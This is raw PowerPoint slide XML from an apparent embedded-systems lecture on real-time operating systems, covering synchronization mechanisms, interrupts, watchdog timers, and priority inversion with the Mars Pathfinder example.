                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8670"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4" name="Freeform 62"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8667"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2" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5984" y="3138"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="11331" y="9023"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7229" name="Line 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11410" y="9168"/>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0" name="Freeform 65"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11334"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1" name="Freeform 66"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11331"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3" name="Group 67"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7542" y="3138"/>
                <a:ext cx="156" cy="326"/>
                <a:chOff x="12999" y="9023"/>
                <a:chExt cx="156" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7227" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipV="1">
                  <a:off x="13076" y="9168"/>
                  <a:ext cx="1"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8" name="Freeform 69"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12999" y="9023"/>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4" name="Group 70"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7225" y="3464"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="12332" y="9349"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7224" name="Line 71"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12411"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5" name="Freeform 72"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12335"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6" name="Freeform 73"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12332"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5" name="Group 74"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4978" y="3464"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="9915" y="9349"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7221" name="Line 75"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9994"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2" name="Freeform 76"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9918"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3" name="Freeform 77"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9915"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206" name="Rectangle 78"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2170" y="2252"/>
                <a:ext cx="169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dirty="0">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Digital camera chip</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7207" name="Oval 79"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="2672"/>
                <a:ext cx="144" cy="720"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7208" name="Rectangle 80"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1617" y="2691"/>
                <a:ext cx="144" cy="720"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7209" name="Rectangle 81"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="3392"/>
                <a:ext cx="42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b="1">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>lens</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7210" name="Rectangle 82"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1463" y="2461"/>
                <a:ext cx="4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a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>CCD </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7211" name="Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2710" y="3050"/>
                <a:ext cx="350" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 350"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 350 w 350"/>
                  <a:gd name="T3" fmla="*/ 1 h 1"/>
                  <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T6" fmla="*/ 0 w 350"/>
                  <a:gd name="T7" fmla="*/ 0 h 1"/>
                  <a:gd name="T8" fmla="*/ 350 w 350"/>
                  <a:gd name="T9" fmla="*/ 1 h 1"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T4">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T5">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T6" t="T7" r="T8" b="T9"/>
                <a:pathLst>
                  <a:path w="350" h="1">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="350" y="1"/>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12" name="Line 84"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1770" y="3110"/>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3" name="Line 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1390" y="3120"/>
                <a:ext cx="2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4" name="Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7910" y="295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15" name="Line 87"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="1760" y="2820"/>
                <a:ext cx="1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6" name="Line 88"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5055" y="4185"/>
                <a:ext cx="0" cy="99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7" name="Line 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2809" y="4986"/>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8" name="Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2732" y="4841"/>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9" name="Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2730" y="5015"/>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0" name="Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7910" y="567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144906166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Other Synchronization Mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Queues / Mailbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to pass data between tasks; a task can block receive (until the queue has data in it) or block send (until the queue has free space in it)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Barrier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Synchronization of multiple tasks to reach an agreed point in code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The barrier object is assigned a number, when that number of tasks are waiting for it, all tasks are released</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Rendezvous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One task sends a message to the other one and waits for a response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>(rendezvous / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sendreceive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The other task waits for an incoming message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>(receive)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, handles it, and sends a reply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>(reply / send)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simulates a “function call” semantic from one task to the other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>two-way barrier, single-message queue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8856890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Interrupts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interrupts are like a thread with the highest priority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It can preempt any thread, and no thread can preempt it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The ISR can call into the OS, but only with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>non-blocking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> calls (ex. put a semaphore, but not get a semaphore)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An ISR that calls into the OS must use the OS provided functions to save and restore contexts (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>why?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using an OS increases the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>interrupt latency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every thread has to take into account the deepest interrupt nesting when assigning the stack size OR use a separate stack for interrupts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many ISR implementations signal a thread that will actually do the interrupt handling (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>DPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Deferred Procedure Call)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124630186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Watchdog timer and multitasking</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Some systems contain a common peripheral called a “Watchdog Timer”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The timer should periodically be reset by FW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When expired, the peripheral resets the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used to “watch” the system and make sure it does not hang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which thread should be responsible for resetting the watchdog?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Priority based scheduling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round robin scheduling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55704343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Mars Pathfinder &amp; priority inversion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>On July 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 1997 the Mars Pathfinder landed on Mars and started transmitting meteorological data and other back to Earth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A few days later the spacecraft computer started experiencing system resets, resulting in postponing experiments to the next day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The problem was root-caused to a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>phenomenon called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Priority </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Inversion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>and fixed immediately</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19460" name="Picture 2" descr="http://www.windows.ucar.edu/mars/images/MPF_mermaiddu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1148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68061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371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Priority Inversion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3886200"/>
            <a:ext cx="8229600" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The H and L tasks share a common resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The L task takes ownership, preventing the H task from running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The M task runs, not allowing the L task from releasing the resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20484" name="Picture 4" descr="http://i.cmpnet.com/embedded/gifs/2004/0406/0406feat3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2057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5832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Priority Inheritance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A task’s priority is temporarily elevated to the priority of the highest task blocked on the resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21508" name="Picture 2" descr="http://i.cmpnet.com/embedded/gifs/2004/0406/0406feat3fig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90800"/>
            <a:ext cx="807720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14057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Selection of RTOS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="8229600" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is an RTOS required?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
